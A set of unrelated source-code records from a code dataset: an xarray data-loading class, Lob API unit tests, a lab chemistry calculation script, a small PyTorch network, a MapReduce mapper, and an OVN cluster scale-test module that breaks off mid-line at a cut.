self.__daterange(fromdate, begin - datetime.timedelta(days = 1))\n \n if pd.Timestamp(todate) > end: \n datearr = self.__daterange(end + datetime.timedelta(days = 1), todate)\n if not duringdate is None:\n duringdate = duringdate.union(datearr)\n else:\n duringdate = datearr\n\n if not duringdate is None and not duringdate.empty:\n data = self.parsedataonline(data, duringdate) \n\n else: \n data = self.parsedataonline(data, self.__daterange(fromdate, todate)) \n\n if data: \n # save if parse new data. \n if doparse and dsaveifparsed:\n self.savedata(data)\n\n # slice data by the date period\n data = data.sel(date = slice(fromdate, todate))\n\n return data\n\n def savedata(self, data): \n if not os.path.exists(self._datasourcepath):\n os.makedirs(self._datasourcepath)\n\n if not data:\n return\n\n # save by year.\n for year in data.groupby('date.year').groups:\n datafilepath = self._getdatafilepath(year)\n\n yeardata = data.sel(date=str(year))\n if os.path.isfile(datafilepath): \n datafromfile = xr.open_dataset(datafilepath, autoclose = True)\n if datafromfile:\n file_begin = datafromfile.indexes['date'][0] \n file_end = datafromfile.indexes['date'][-1]\n\n begin = yeardata.indexes['date'][0]\n end = yeardata.indexes['date'][-1]\n\n if file_begin > begin or file_end < end:\n if file_begin < begin:\n yeardata = xr.merge([yeardata, datafromfile.sel(date = slice(file_begin, begin))]) \n if file_end > end: \n yeardata = xr.merge([yeardata, datafromfile.sel(date = slice(end, file_end))]) \n else:\n continue\n\n yeardata.to_netcdf(datafilepath)\n\n def readyeardata(self, year, periods = 0, doparse = True):\n \"\"\" read data and merge parsed data from line if needed.\n \"\"\" \n return self.readdata(datetime.date(year, 1, 1), datetime.date(year + periods, 12, 31), doparse = doparse)\n\n def readpastdata(self, years, doparse = True):\n day = dateutil.today()\n return self.readdata(datetime.date(day.year - years, day.month, day.day), day, doparse = doparse)\n\n def getdatacolumns(self, data):\n if data is None:\n return None\n\n return data.coords['columns']\n \n def getbydate(self, date, method = 'nearest'): \n if not date:\n return None\n\n if not self.isdatevalid(date):\n return None\n\n data = self.readyeardata(date.year)\n if not data:\n return None\n\n da = data.sel(date = date, method = method)\n if not da:\n return None\n\n return da\n\n def get(self, sec, col, doparse = True):\n data = self.readdata(doparse = doparse)\n if not data:\n return None\n\n indexes = {'Sector Code' : sec, 'columns' : col} \n return data.sel(**indexes , drop = True).data.to_dataframe()","sub_path":"base/co/asyncio_coro_sample.py","file_name":"asyncio_coro_sample.py","file_ext":"py","file_size_in_byte":17285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"18899426","text":"import unittest\nimport lob\nfrom lob.compat import BytesIO\n\n\nclass ObjectFunctions(unittest.TestCase):\n def setUp(self):\n lob.api_key = 'test_fc26575412e92e22a926bc96c857f375f8b'\n self.obj = lob.Object.list(limit=1).data[0]\n\n def test_list_objects(self):\n objects = lob.Object.list()\n self.assertTrue(isinstance(objects.data[0], lob.Object))\n self.assertEqual(objects.object, 'list')\n\n def test_list_objects_limit(self):\n objects = lob.Object.list(limit=2)\n self.assertTrue(isinstance(objects.data[0], lob.Object))\n self.assertEqual(len(objects.data), 2)\n\n def test_list_objects_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.list, limit=1000)\n\n def test_create_object_remote(self):\n object = lob.Object.create(\n description = 'Test Object',\n file = 'https://lob.com/postcardfront.pdf',\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object')\n\n def test_create_object_stringio(self):\n object = lob.Object.create(\n description = 'Test Object BytesIO',\n file = BytesIO(open('tests/pc.pdf', 'rb').read()),\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object BytesIO')\n\n def test_create_object_local(self):\n object = lob.Object.create(\n description = 'Test Object Inline',\n file = open('tests/pc.pdf', 'rb'),\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object Inline')\n self.assertRaises(AttributeError, lambda: object.nonexistent_key)\n\n object.description = \"something new\"\n self.assertEqual(object.description, \"something new\")\n\n def test_create_directly_specify_files(self):\n object = lob.Object.create(\n description = 'Test Object Direct Specify',\n files = {'file': open('tests/pc.pdf', 'rb').read()},\n setting = 201\n )\n\n self.assertTrue(isinstance(object, lob.Object))\n self.assertEqual(object.description, 'Test Object Direct Specify')\n\n def test_create_object_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.create)\n\n def test_retrieve_job(self):\n job = lob.Object.retrieve(id=lob.Object.list().data[0].id)\n self.assertTrue(isinstance(job, lob.Object))\n\n def test_retrieve_job_fail(self):\n self.assertRaises(lob.error.InvalidRequestError, lob.Object.retrieve, id='test')\n","sub_path":"tests/test_object.py","file_name":"test_object.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"26575607","text":"#!/usr/bin/env python\nimport numpy as np\nfrom scipy import stats\nimport sys\nsys.stdout = open('results.txt', 'w')\n\ndata = np.genfromtxt('sampleData.txt', delimiter=' ', skip_header=1, \\\n names=['sample', 'meanAbs', 'SD', 'abs1', 'abs2', 'abs3', 'abs4', 'abs5'])\n\n# calibration curve function\n# f(x) = 0.06274x + 0.001135\nabsorbance = []\nfor i in range (0, 7):\n absorbance.append(data['meanAbs'][i])\n\nHEBppm = []\nfor i in range (1, 4):\n HEBppm.append((absorbance[i] - 0.001135) / 0.06274)\n\nLiptonppm = []\nfor i in range (4, 7):\n Liptonppm.append((absorbance[i] - 0.001135) / 0.06274)\n\n\nprint ('[Cu] in HEB (ppm): \\t', np.mean(HEBppm))\nprint ('[Cu] in Lipton (ppm): \\t', np.mean(Liptonppm))\n\nHEBmg = []\nLiptonmg = []\nfor i in range (0, 3):\n HEBmg.append(HEBppm[i] * 0.025)\n Liptonmg.append(Liptonppm[i] * 0.025)\n\n# sample weights (g)\nHEBweight = [0.3759, 0.3722, 0.3445]\nLiptonweight = [0.4508, 0.3238, 0.3897]\n\nprint ()\n# results in mg of Cu/kg of tea\nHEBratio = []\nLiptonratio = []\n\nfor i in range (0, 3):\n HEBratio.append(HEBmg[i]/(HEBweight[i]/1000))\n Liptonratio.append(Liptonmg[i]/(Liptonweight[i]/1000))\n\nHEBmean = np.mean(HEBratio)\nLiptonmean = np.mean(Liptonratio)\n\nHEBstd = np.std(HEBratio)\nLiptonstd = np.std(Liptonratio)\n\nprint ('Results in Cu (mg) / kg tea')\nprint ('----------------------------')\nprint ('HEB mean: \\t', HEBmean)\nprint ('std: \\t\\t', HEBstd)\nprint ()\n\nprint ('Lipton mean: \\t', Liptonmean)\nprint ('std: \\t\\t', Liptonstd)\n\n","sub_path":"achem_2017/project/progressReport/data/calcData.py","file_name":"calcData.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"276731562","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/test/net.py\n# Compiled at: 2019-01-07 00:16:59\n# Size of source mod 2**32: 604 bytes\nimport torch.nn as nn, torch.nn.functional as F\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 20, 5, 1)\n self.conv2 = nn.Conv2d(20, 50, 5, 1)\n self.fc1 = nn.Linear(800, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 800)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)","sub_path":"pycfiles/karas-0.7.0-py3.6/net.cpython-36.py","file_name":"net.cpython-36.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"568575544","text":"__author__ = 'Ondrej Galbavy'\n\nimport sys\n\n# 3. job mapper - filter records\n# 1. and 2. job output\n# ->\n# type_id%used_by\\tobject_id\n# type_id%title\\tvalue\n\ndef parse_line(line):\n ckey, value = line.split(\"\\t\", 1)\n key, rel = ckey.split(\"%\", 1)\n return key.strip(), rel.strip(), value.strip()\n\nfor line in sys.stdin:\n key, rel, value = parse_line(line)\n\n if rel == 'used_by' or rel == 'title':\n print(line.strip())\n","sub_path":"python/src/mr_extractor_avro/job3mapper.py","file_name":"job3mapper.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"630588678","text":"import main\n\nclient = main.mongodb_conn_create()\nchannel = main.rabbitmq_conn_create()\nsteamid = \"76561198019267094\"\n\ntry:\n user_data = main.steam_get_user(steamid)\n main.rabbitmq_publish(channel, 'UserData', 'SteamUserData', user_data)\nfinally:\n main.mongodb_conn_close(client)\n main.rabbitmq_conn_close(channel)\n","sub_path":"Kickoff.py","file_name":"Kickoff.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"88371498","text":"import logging\nimport ovn_exceptions\nimport ovn_sandbox\nimport ovn_stats\nimport ovn_utils\nimport ovn_load_balancer as lb\nimport time\nimport netaddr\nfrom collections import namedtuple\nfrom collections import defaultdict\nfrom randmac import RandMac\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\n\nClusterConfig = namedtuple(\n 'ClusterConfig',\n [\n 'monitor_all',\n 'logical_dp_groups',\n 'clustered_db',\n 'datapath_type',\n 'raft_election_to',\n 'northd_probe_interval',\n 'northd_threads',\n 'db_inactivity_probe',\n 'node_net',\n 'enable_ssl',\n 'node_remote',\n 'node_timeout_s',\n 'internal_net',\n 'external_net',\n 'gw_net',\n 'cluster_net',\n 'n_workers',\n 'n_relays',\n 'vips',\n 'vips6',\n 'vip_subnet',\n 'static_vips',\n 'static_vips6',\n 'use_ovsdb_etcd',\n 'ssl_private_key',\n 'ssl_cert',\n 'ssl_cacert',\n ],\n)\n\n\nBrExConfig = namedtuple('BrExConfig', ['physical_net'])\n\n\nclass Node(ovn_sandbox.Sandbox):\n def __init__(self, phys_node, container, mgmt_net, mgmt_ip):\n super(Node, self).__init__(phys_node, container)\n self.container = container\n self.mgmt_net = mgmt_net\n self.mgmt_ip = mgmt_ip\n\n\nclass CentralNode(Node):\n def __init__(\n self, phys_node, db_containers, relay_containers, mgmt_net, mgmt_ip\n ):\n super(CentralNode, self).__init__(\n phys_node, db_containers[0], mgmt_net, mgmt_ip\n )\n self.db_containers = db_containers\n self.relay_containers = relay_containers\n\n def start(self, cluster_cfg):\n log.info('Configuring central node')\n self.set_raft_election_timeout(cluster_cfg.raft_election_to)\n self.enable_trim_on_compaction()\n self.set_northd_threads(cluster_cfg.northd_threads)\n\n def set_northd_threads(self, n_threads):\n log.info(f'Configuring northd to use {n_threads} threads')\n for container in self.db_containers:\n self.phys_node.run(\n f'podman exec {container} ovn-appctl -t '\n f'ovn-northd parallel-build/set-n-threads '\n f'{n_threads}'\n )\n\n def set_raft_election_timeout(self, timeout_s):\n for timeout in range(1000, (timeout_s + 1) * 1000, 1000):\n log.info(f'Setting RAFT election timeout to {timeout}ms')\n self.run(\n cmd=f'ovs-appctl -t '\n f'/run/ovn/ovnnb_db.ctl cluster/change-election-timer '\n f'OVN_Northbound {timeout}'\n )\n self.run(\n cmd=f'ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl cluster/change-election-timer '\n f'OVN_Southbound {timeout}'\n )\n time.sleep(1)\n\n def enable_trim_on_compaction(self):\n log.info('Setting DB trim-on-compaction')\n for db_container in self.db_containers:\n self.phys_node.run(\n f'podman exec {db_container} ovs-appctl -t '\n f'/run/ovn/ovnnb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n self.phys_node.run(\n f'podman exec {db_container} ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n for relay_container in self.relay_containers:\n self.phys_node.run(\n f'podman exec {relay_container} ovs-appctl -t '\n f'/run/ovn/ovnsb_db.ctl '\n f'ovsdb-server/memory-trim-on-compaction on'\n )\n\n def get_connection_string(self, cluster_cfg, port):\n protocol = \"ssl\" if cluster_cfg.enable_ssl else \"tcp\"\n ip = self.mgmt_ip\n num_conns = 3 if cluster_cfg.clustered_db else 1\n conns = [f\"{protocol}:{ip + idx}:{port}\" for idx in range(num_conns)]\n return \",\".join(conns)\n\n def central_containers(self):\n return self.db_containers\n\n\nclass WorkerNode(Node):\n def __init__(\n self,\n phys_node,\n container,\n mgmt_net,\n mgmt_ip,\n int_net,\n ext_net,\n gw_net,\n unique_id,\n ):\n super(WorkerNode, self).__init__(\n phys_node, container, mgmt_net, mgmt_ip\n )\n self.int_net = int_net\n self.ext_net = ext_net\n self.gw_net = gw_net\n self.id = unique_id\n self.switch = None\n self.gw_router = None\n self.ext_switch = None\n self.lports = []\n self.next_lport_index = 0\n self.vsctl = None\n\n def start(self, cluster_cfg):\n self.vsctl = ovn_utils.OvsVsctl(\n self,\n self.get_connection_string(cluster_cfg, 6640),\n cluster_cfg.db_inactivity_probe // 1000,\n )\n\n @ovn_stats.timeit\n def connect(self, cluster_cfg):\n log.info(\n f'Connecting worker {self.container}: '\n f'ovn-remote = {cluster_cfg.node_remote}'\n )\n self.vsctl.set_global_external_id(\n 'ovn-remote', f'{cluster_cfg.node_remote}'\n )\n\n def configure_localnet(self, physical_net):\n log.info(f'Creating localnet on {self.container}')\n self.vsctl.set_global_external_id(\n 'ovn-bridge-mappings', f'{physical_net}:br-ex'\n )\n\n def configure(self, physical_net):\n self.configure_localnet(physical_net)\n phys_ctl = ovn_utils.PhysCtl(self)\n phys_ctl.external_host_provision(\n ip=self.ext_net.reverse(2), gw=self.ext_net.reverse()\n )\n\n @ovn_stats.timeit\n def wait(self, sbctl, timeout_s):\n for _ in range(timeout_s * 10):\n if sbctl.chassis_bound(self.container):\n return\n time.sleep(0.1)\n raise ovn_exceptions.OvnChassisTimeoutException()\n\n @ovn_stats.timeit\n def provision(self, cluster):\n self.connect(cluster.cluster_cfg)\n self.wait(cluster.sbctl, cluster.cluster_cfg.node_timeout_s)\n\n # Create a node switch and connect it to the cluster router.\n self.switch = cluster.nbctl.ls_add(\n f'lswitch-{self.container}', net_s=self.int_net\n )\n lrp_name = f'rtr-to-node-{self.container}'\n ls_rp_name = f'node-to-rtr-{self.container}'\n self.rp = cluster.nbctl.lr_port_add(\n cluster.router, lrp_name, RandMac(), self.int_net.reverse()\n )\n self.ls_rp = cluster.nbctl.ls_port_add(\n self.switch, ls_rp_name, self.rp\n )\n\n # Make the lrp as distributed gateway router port.\n cluster.nbctl.lr_port_set_gw_chassis(self.rp, self.container)\n\n # Create a gw router and connect it to the cluster join switch.\n self.gw_router = cluster.nbctl.lr_add(f'gwrouter-{self.container}')\n cluster.nbctl.lr_set_options(\n self.gw_router,\n {\n 'always_learn_from_arp_request': 'false',\n 'dynamic_neigh_routers': 'true',\n 'chassis': self.container,\n 'lb_force_snat_ip': 'router_ip',\n 'snat-ct-zone': 0,\n },\n )\n join_grp_name = f'gw-to-join-{self.container}'\n join_ls_grp_name = f'join-to-gw-{self.container}'\n\n gr_gw = self.gw_net.reverse(self.id + 2)\n self.gw_rp = cluster.nbctl.lr_port_add(\n self.gw_router, join_grp_name, RandMac(), gr_gw\n )\n self.join_gw_rp = cluster.nbctl.ls_port_add(\n cluster.join_switch, join_ls_grp_name, self.gw_rp\n )\n\n # Create an external switch connecting the gateway router to the\n # physnet.\n self.ext_switch = cluster.nbctl.ls_add(\n f'ext-{self.container}', net_s=self.ext_net\n )\n ext_lrp_name = f'gw-to-ext-{self.container}'\n ext_ls_rp_name = f'ext-to-gw-{self.container}'\n self.ext_rp = cluster.nbctl.lr_port_add(\n self.gw_router, ext_lrp_name, RandMac(), self.ext_net.reverse()\n )\n self.ext_gw_rp = cluster.nbctl.ls_port_add(\n self.ext_switch, ext_ls_rp_name, self.ext_rp\n )\n\n # Configure physnet.\n self.physnet_port = cluster.nbctl.ls_port_add(\n self.ext_switch,\n f'provnet-{self.container}',\n localnet=True,\n )\n cluster.nbctl.ls_port_set_set_type(self.physnet_port, 'localnet')\n cluster.nbctl.ls_port_set_set_options(\n self.physnet_port, f'network_name={cluster.brex_cfg.physical_net}'\n )\n\n # Route for traffic entering the cluster.\n cluster.nbctl.route_add(\n self.gw_router, cluster.net, self.gw_net.reverse()\n )\n\n # Default route to get out of cluster via physnet.\n cluster.nbctl.route_add(\n self.gw_router,\n ovn_utils.DualStackSubnet(\n netaddr.IPNetwork(\"0.0.0.0/0\"), netaddr.IPNetwork(\"::/0\")\n ),\n self.ext_net.reverse(2),\n )\n\n # Route for traffic that needs to exit the cluster\n # (via gw router).\n cluster.nbctl.route_add(\n cluster.router, self.int_net, gr_gw, policy=\"src-ip\"\n )\n\n # SNAT traffic leaving the cluster.\n cluster.nbctl.nat_add(self.gw_router, gr_gw, cluster.net)\n\n @ovn_stats.timeit\n def provision_port(self, cluster, passive=False):\n name = f'lp-{self.id}-{self.next_lport_index}'\n\n log.info(f'Creating lport {name}')\n lport = cluster.nbctl.ls_port_add(\n self.switch,\n name,\n mac=str(RandMac()),\n ip=self.int_net.forward(self.next_lport_index + 1),\n gw=self.int_net.reverse(),\n ext_gw=self.ext_net.reverse(2),\n metadata=self,\n passive=passive,\n security=True,\n )\n\n self.lports.append(lport)\n self.next_lport_index += 1\n return lport\n\n @ovn_stats.timeit\n def unprovision_port(self, cluster, port):\n cluster.nbctl.ls_port_del(port)\n self.unbind_port(port)\n self.lports.remove(port)\n\n @ovn_stats.timeit\n def provision_load_balancers(self, cluster, ports, global_cfg):\n # Add one port IP as a backend to the cluster load balancer.\n if global_cfg.run_ipv4:\n port_ips = (\n f'{port.ip}:{DEFAULT_BACKEND_PORT}'\n for port in ports\n if port.ip is not None\n )\n cluster_vips = cluster.cluster_cfg.vips.keys()\n cluster.load_balancer.add_backends_to_vip(port_ips, cluster_vips)\n cluster.load_balancer.add_to_switches([self.switch.name])\n cluster.load_balancer.add_to_routers([self.gw_router.name])\n\n if global_cfg.run_ipv6:\n port_ips6 = (\n f'[{port.ip6}]:{DEFAULT_BACKEND_PORT}'\n for port in ports\n if port.ip6 is not None\n )\n cluster_vips6 = cluster.cluster_cfg.vips6.keys()\n cluster.load_balancer6.add_backends_to_vip(\n port_ips6, cluster_vips6\n )\n cluster.load_balancer6.add_to_switches([self.switch.name])\n cluster.load_balancer6.add_to_routers([self.gw_router.name])\n\n # GW Load balancer has no VIPs/backends configured on it, since\n # this load balancer is used for hostnetwork services. We're not\n # using those right now so the load blaancer is empty.\n if global_cfg.run_ipv4:\n self.gw_load_balancer = lb.OvnLoadBalancer(\n f'lb-{self.gw_router.name}', cluster.nbctl\n )\n self.gw_load_balancer.add_to_routers([self.gw_router.name])\n if global_cfg.run_ipv6:\n self.gw_load_balancer6 = lb.OvnLoadBalancer(\n f'lb-{self.gw_router.name}6', cluster.nbctl\n )\n self.gw_load_balancer6.add_to_routers([self.gw_router.name])\n\n @ovn_stats.timeit\n def bind_port(self, port):\n log.info(f'Binding lport {port.name} on {self.container}')\n self.vsctl.add_port(port, 'br-int', internal=True, ifaceid=port.name)\n # Skip creating a netns for \"passive\" ports, we won't be sending\n # traffic on those.\n if not port.passive:\n self.vsctl.bind_vm_port(port)\n\n @ovn_stats.timeit\n def unbind_port(self, port):\n if not port.passive:\n self.vsctl.unbind_vm_port(port)\n self.vsctl.del_port(port)\n\n def provision_ports(self, cluster, n_ports, passive=False):\n ports = [self.provision_port(cluster, passive) for i in range(n_ports)]\n for port in ports:\n self.bind_port(port)\n return ports\n\n def run_ping(self, cluster, src, dest):\n log.info(f'Pinging from {src} to {dest}')\n\n # FIXME\n # iputils is inconsistent when working with sub-second timeouts.\n # The behavior of ping's \"-W\" option changed a couple of times already.\n # https://github.com/iputils/iputils/issues/290\n # Until that's stable use \"timeout 0.1s\" instead.\n cmd = f'ip netns exec {src} timeout 0.1s ping -q -c 1 {dest}'\n start_time = datetime.now()\n while True:\n try:\n self.run(cmd=cmd, raise_on_error=True)\n break\n except ovn_exceptions.SSHError:\n pass\n\n duration = (datetime.now() - start_time).seconds\n if duration > cluster.cluster_cfg.node_timeout_s:\n log.error(\n f'Timeout waiting for {src} ' f'to be able to ping {dest}'\n )\n raise ovn_exceptions.OvnPingTimeoutException()\n\n @ovn_stats.timeit\n def ping_port(self, cluster, port, dest):\n self.run_ping(cluster, port.name, dest)\n\n @ovn_stats.timeit\n def ping_external(self, cluster, port):\n if port.ip:\n self.run_ping(cluster, 'ext-ns', port.ip)\n if port.ip6:\n self.run_ping(cluster, 'ext-ns', port.ip6)\n\n def ping_ports(self, cluster, ports):\n for port in ports:\n if port.ip:\n self.ping_port(cluster, port, dest=port.ext_gw)\n if port.ip6:\n self.ping_port(cluster, port, dest=port.ext_gw6)\n\n def get_connection_string(self, cluster_cfg, port):\n protocol = \"ssl\" if cluster_cfg.enable_ssl else \"tcp\"\n offset = 0\n offset += 3 if cluster_cfg.clustered_db else 1\n offset += cluster_cfg.n_relays\n return f\"{protocol}:{self.mgmt_ip + offset}:{port}\"\n\n\nACL_DEFAULT_DENY_PRIO = 1\nACL_DEFAULT_ALLOW_ARP_PRIO = 2\nACL_NETPOL_ALLOW_PRIO = 3\nDEFAULT_NS_VIP_SUBNET = netaddr.IPNetwork('30.0.0.0/16')\nDEFAULT_NS_VIP_SUBNET6 = netaddr.IPNetwork('30::/32')\nDEFAULT_VIP_PORT = 80\nDEFAULT_BACKEND_PORT = 8080\n\n\nclass Namespace(object):\n def __init__(self, cluster, name, global_cfg):\n self.cluster = cluster\n self.nbctl = cluster.nbctl\n self.ports = []\n self.enforcing = False\n self.pg_def_deny_igr = self.nbctl.port_group_create(\n f'pg_deny_igr_{name}'\n )\n self.pg_def_deny_egr = self.nbctl.port_group_create(\n f'pg_deny_egr_{name}'\n )\n self.pg = self.nbctl.port_group_create(f'pg_{name}')\n self.addr_set4 = (\n self.nbctl.address_set_create(f'as_{name}')\n if global_cfg.run_ipv4\n else None\n )\n self.addr_set6 = (\n self.nbctl.address_set_create(f'as6_{name}')\n if global_cfg.run_ipv6\n else None\n )\n self.sub_as = []\n self.sub_pg = []\n self.load_balancer = None\n self.cluster.n_ns += 1\n self.name = name\n\n @ovn_stats.timeit\n def add_ports(self, ports):\n self.ports.extend(ports)\n # Always add port IPs to the address set but not to the PGs.\n # Simulate what OpenShift does, which is: create the port groups\n # when the first network policy is applied.\n if self.addr_set4:\n self.nbctl.address_set_add_addrs(\n self.addr_set4, [str(p.ip) for p in ports]\n )\n if self.addr_set6:\n self.nbctl.address_set_add_addrs(\n self.addr_set6, [str(p.ip6) for p in ports]\n )\n if self.enforcing:\n self.nbctl.port_group_add_ports(self.pg_def_deny_igr, ports)\n self.nbctl.port_group_add_ports(self.pg_def_deny_egr, ports)\n self.nbctl.port_group_add_ports(self.pg, ports)\n\n def unprovision(self):\n # ACLs are garbage collected by OVSDB as soon as all the records\n # referencing them are removed.\n self.cluster.unprovision_ports(self.ports)\n self.nbctl.port_group_del(self.pg_def_deny_igr)\n self.nbctl.port_group_del(self.pg_def_deny_egr)\n self.nbctl.port_group_del(self.pg)\n if self.addr_set4:\n self.nbctl.address_set_del(self.addr_set4)\n if self.addr_set6:\n self.nbctl.address_set_del(self.addr_set6)\n for pg in self.sub_pg:\n self.nbctl.port_group_del(pg)\n for addr_set in self.sub_as:\n self.nbctl.address_set_del(addr_set)\n\n def unprovision_ports(self, ports):\n '''Unprovision a subset of ports in the namespace without having to\n unprovision the entire namespace or any of its network policies.'''\n\n for port in ports:\n self.ports.remove(port)\n\n self.cluster.unprovision_ports(ports)\n\n def enforce(self):\n if self.enforcing:\n return\n self.enforcing = True\n self.nbctl.port_group_add_ports(self.pg_def_deny_igr, self.ports)\n self.nbctl.port_group_add_ports(self.pg_def_deny_egr, self.ports)\n self.nbctl.port_group_add_ports(self.pg, self.ports)\n\n def create_sub_ns(self, ports, global_cfg):\n n_sub_pgs = len(self.sub_pg)\n suffix = f'{self.name}_{n_sub_pgs}'\n pg = self.nbctl.port_group_create(f'sub_pg_{suffix}')\n self.nbctl.port_group_add_ports(pg, ports)\n self.sub_pg.append(pg)\n if global_cfg.run_ipv4:\n addr_set = self.nbctl.address_set_create(f'sub_as_{suffix}')\n self.nbctl.address_set_add_addrs(\n addr_set, [str(p.ip) for p in ports]\n )\n self.sub_as.append(addr_set)\n if global_cfg.run_ipv6:\n addr_set = self.nbctl.address_set_create(f'sub_as_{suffix}6')\n self.nbctl.address_set_add_addrs(\n addr_set, [str(p.ip6) for p in ports]\n )\n self.sub_as.append(addr_set)\n return n_sub_pgs\n\n @ovn_stats.timeit\n def default_deny(self, family):\n self.enforce()\n\n addr_set = f'self.addr_set{family}.name'\n self.nbctl.acl_add(\n self.pg_def_deny_igr.name,\n 'to-lport',\n ACL_DEFAULT_DENY_PRIO,\n 'port-group',\n f'ip4.src == \\\\${addr_set} && '\n f'outport == @{self.pg_def_deny_igr.name}',\n 'drop',\n )\n self.nbctl.acl_add(\n self.pg_def_deny_egr.name,\n 'to-lport',\n ACL_DEFAULT_DENY_PRIO,\n 'port-group',\n f'ip4.dst == \\\\${addr_set} && '\n f'inport == @{self.pg_def_deny_egr.name}',\n 'drop',\n )\n self.nbctl.acl_add(\n self.pg_def_deny_igr.name,\n 'to-lport',\n ACL_DEFAULT_ALLOW_ARP_PRIO,\n 'port-group',\n f'outport == @{self.pg_def_deny_igr.name} && arp',\n 'allow',\n )\n self.nbctl.acl_add(\n self.pg_def_deny_egr.name,\n 'to-lport',\n ACL_DEFAULT_ALLOW_ARP_PRIO,\n 'port-group',\n f'inport == @{self.pg_def_deny_egr.name} && arp',\n 'allow',\n )\n\n @ovn_stats.timeit\n def allow_within_namespace(self, family):\n self.enforce()\n\n addr_set = f'self.addr_set{family}.name'\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip4.src == \\\\${addr_set} && outport == @{self.pg.name}',\n 'allow-related',\n )\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip4.dst == \\\\${addr_set} && inport == @{self.pg.name}',\n 'allow-related',\n )\n\n @ovn_stats.timeit\n def allow_cross_namespace(self, ns, family):\n self.enforce()\n\n addr_set = f'self.addr_set{family}.name'\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip4.src == \\\\${addr_set} && outport == @{ns.pg.name}',\n 'allow-related',\n )\n ns_addr_set = f'ns.addr_set{family}.name'\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip4.dst == \\\\${ns_addr_set} && inport == @{self.pg.name}',\n 'allow-related',\n )\n\n @ovn_stats.timeit\n def allow_sub_namespace(self, src, dst, family):\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip{family}.src == \\\\${self.sub_as[src].name} && '\n f'outport == @{self.sub_pg[dst].name}',\n 'allow-related',\n )\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip{family}.dst == \\\\${self.sub_as[dst].name} && '\n f'inport == @{self.sub_pg[src].name}',\n 'allow-related',\n )\n\n @ovn_stats.timeit\n def allow_from_external(\n self, external_ips, include_ext_gw=False, family=4\n ):\n self.enforce()\n # If requested, include the ext-gw of the first port in the namespace\n # so we can check that this rule is enforced.\n if include_ext_gw:\n assert len(self.ports) > 0\n if family == 4 and self.ports[0].ext_gw:\n external_ips.append(self.ports[0].ext_gw)\n elif family == 6 and self.ports[0].ext_gw6:\n external_ips.append(self.ports[0].ext_gw6)\n ips = [str(ip) for ip in external_ips]\n self.nbctl.acl_add(\n self.pg.name,\n 'to-lport',\n ACL_NETPOL_ALLOW_PRIO,\n 'port-group',\n f'ip.{family} == {{{\",\".join(ips)}}} && '\n f'outport == @{self.pg.name}',\n 'allow-related',\n )\n\n @ovn_stats.timeit\n def check_enforcing_internal(self):\n # \"Random\" check that first pod can reach last pod in the namespace.\n if len(self.ports) > 1:\n src = self.ports[0]\n dst = self.ports[-1]\n worker = src.metadata\n if src.ip:\n worker.ping_port(self.cluster, src, dst.ip)\n if src.ip6:\n worker.ping_port(self.cluster, src, dst.ip6)\n\n @ovn_stats.timeit\n def check_enforcing_external(self):\n if len(self.ports) > 0:\n dst = self.ports[0]\n worker = dst.metadata\n worker.ping_external(self.cluster, dst)\n\n @ovn_stats.timeit\n def check_enforcing_cross_ns(self, ns):\n if len(self.ports) > 0 and len(ns.ports) > 0:\n dst = ns.ports[0]\n src = self.ports[0]\n worker = src.metadata\n if src.ip and dst.ip:\n worker.ping_port(self.cluster, src, dst.ip)\n if src.ip6 and dst.ip6:\n worker.ping_port(self.cluster, src, dst.ip6)\n\n def create_load_balancer(self):\n self.load_balancer = lb.OvnLoadBalancer(f'lb_{self.name}', self.nbctl)\n\n @ovn_stats.timeit\n def provision_vips_to_load_balancers(self, backend_lists, version):\n vip_ns_subnet = DEFAULT_NS_VIP_SUBNET\n if version == 6:\n vip_ns_subnet = 